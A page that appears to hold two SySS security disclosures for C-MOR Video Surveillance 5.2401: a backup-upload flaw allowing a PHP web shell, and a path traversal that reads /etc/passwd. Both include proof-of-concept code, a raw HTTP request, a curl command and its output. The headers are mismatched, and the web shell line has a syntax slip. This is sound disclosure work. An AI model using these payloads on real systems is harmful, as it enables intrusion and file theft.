"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to upload  
dangerous files, for instance PHP code, to the C-MOR system.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that the  
upload functionality for backup files allows an authenticated user to  
upload arbitrary files. The only condition is that the file name  
contains the string ".cbkf".

Therefore, "webshell.cbkf.php" is considered a valid file name for  
the C-MOR web application.

Uploaded files are stored within the directory "/srv/www/backups" on  
the C-MOR system and can thus be accessed via the URL  
https://<HOST>/backup/upload_<FILENAME>.

Due to broken access control, also low-privileged authenticated users  
can use this file upload functionality (see SYSS-2024-024[3]).

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the upload functionality for backup files, it is possible to  
upload arbitrary PHP code, for instance a simple PHP web shell such  
as the following one, in a file named "webshell.cbkf.php":

<?php echo system($_GET['cmd'); ?>

After a successful file upload, the uploaded PHP web shell can be  
accessed and used via the following URL, leading to OS command  
execution:

https://<HOST>/backup/upload_webshell.cbkf.php?cmd=<COMMAND>

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-026

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-026.txt  
[3] SySS Security Advisory SYSS-2024-024

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-024.txt  
[4] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

C-MOR Video Surveillance 5.2401 Remote Shell Upload

C-MOR Video Surveillance version 5.2401 suffers from a path traversal vulnerability.

Advisory ID:               SYSS-2024-025  
Product:                   C-MOR Video Surveillance  
Manufacturer:              za-internet GmbH  
Affected Version(s):       5.2401  
Tested Version(s):         5.2401  
Vulnerability Type:        Relative Path Traversal (CWE-23)  
Risk Level:                High  
Solution Status:           Fixed  
Manufacturer Notification: 2024-04-05  
Solution Date:             2024-07-31  
Public Disclosure:         2024-09-04  
CVE Reference:             CVE-2024-45178  
Authors of Advisory:       Chris Beiter, Frederik Beimgraben,  
                            and Matthias Deeg

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

The software product C-MOR is an IP video surveillance system.

The manufacturer describes the product as follows:

"With C-MOR video surveillance, it is possible to check your  
surveillance over network and the Internet. You can access the live  
view as well as previous recordings from any PC or mobile device.  
C-MOR is managed and controlled over the C-MOR web interface.  
IP settings, camera recording setup, user rights and so on are set  
over the web without the installation of any software on the  
client."[1]

Due to improper user input validation, it is possible to download  
arbitrary files from the C-MOR system via a path traversal attack.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

By analyzing the C-MOR web interface, it was found that different  
functionalities are vulnerable to path traversal attacks, which is  
due to insufficient user input validation.

For instance, the download functionality for backups provided by the  
script "download-bkf.pml" is vulnerable to a path traversal  
attack via the parameter "bkf".

This enables an authenticated user to download arbitrary files as  
Linux user "www-data" from the C-MOR system.

Another path traversal attack is in the script "show-movies.pml",  
which can be exploited via the parameter "cam".

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Using the following HTTP POST request with the relative path  
"../../../../etc/passwd" as value for the parameter "bkf", it is  
possible to download the file "/etc/passwd":

POST /download-bkf.pml HTTP/1.1  
Host: <HOST>  
Authorization: Basic <CREDENTIALS>  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 26

bkf=../../../../etc/passwd

An example of a successful path traversal attack is demonstrated via  
the following curl command:

$ curl -X POST -d 'bkf=../../../../etc/passwd' --user   
'<USERNAME>:<PASSWORD>' --ciphers 'DEFAULT:!DH'   
https://<HOST>/download-bkf.pml  
root:x:0:0:root:/root:/bin/bash  
daemon:x:1:1:daemon:/usr/sbin:/bin/sh  
bin:x:2:2:bin:/bin:/bin/sh  
sys:x:3:3:sys:/dev:/bin/sh  
sync:x:4:65534:sync:/bin:/bin/sync  
games:x:5:60:games:/usr/games:/bin/sh  
man:x:6:12:man:/var/cache/man:/bin/sh  
lp:x:7:7:lp:/var/spool/lpd:/bin/sh  
mail:x:8:8:mail:/var/mail:/bin/sh  
news:x:9:9:news:/var/spool/news:/bin/sh  
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh  
proxy:x:13:13:proxy:/bin:/bin/sh  
www-data:x:33:33:www-data:/var/www:/bin/sh  
backup:x:34:34:backup:/var/backups:/bin/sh  
list:x:38:38:Mailing List Manager:/var/list:/bin/sh  
irc:x:39:39:ircd:/var/run/ircd:/bin/sh  
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh  
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh  
libuuid:x:100:101::/var/lib/libuuid:/bin/sh  
Debian-exim:x:101:103::/var/spool/exim4:/bin/false  
statd:x:102:65534::/var/lib/nfs:/bin/false  
sshd:x:103:65534::/var/run/sshd:/usr/sbin/nologin  
cam:x:1000:1000:Cam,,,:/home/cam:/bin/bash  
postfix:x:104:107::/var/spool/postfix:/bin/false  
stunnel4:x:105:109::/var/run/stunnel4:/bin/false  
mysql:x:106:110:MySQL Server,,,:/var/lib/mysql:/bin/false  
messagebus:x:107:113::/var/run/dbus:/bin/false  
ntp:x:108:114::/home/ntp:/bin/false  
download:x:1002:1002:Download User:/home/download:/bin/bash

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

Install C-MOR Video Surveillance version 6.00PL1.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2024-04-05: Vulnerability reported to manufacturer  
2024-04-05: Manufacturer acknowledges receipt of security advisories  
2024-04-08: Exchange regarding security updates and disclosure timeline  
2024-05-08: Further exchange concerning security updates and disclosure  
             timeline; public release of all security advisories  
             scheduled for release of C-MOR Video Surveillance version 6  
2024-05-10: Release of C-MOR software version 5.30 with security updates  
             for some reported security issues  
2024-07-19: E-mail to manufacturer concerning release date of C-MOR  
             Video Surveillance version 6; response with planned  
             release date of 2024-08-01  
2024-07-30: E-mail from manufacturer with further information  
             concerning security fixes  
2024-07-31: Release of C-MOR software version 6.00PL1  
2024-09-04: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for C-MOR Video Surveillance  
     https://www.c-mor.com/  
[2] SySS Security Advisory SYSS-2024-025

 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2024-025.txt  
[3] SySS Responsible Disclosure Policy  
     https://www.syss.de/en/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Chris Beiter, Frederik  
Beimgraben, and Matthias Deeg.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"  
and without warranty of any kind. Details of this security advisory may  
be updated in order to provide as accurate information as possible. The  
latest version of this security advisory is available on the SySS Web  
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0  
URL: http://creativecommons.org/licenses/by/3.0/deed.en

Source

Packet Storm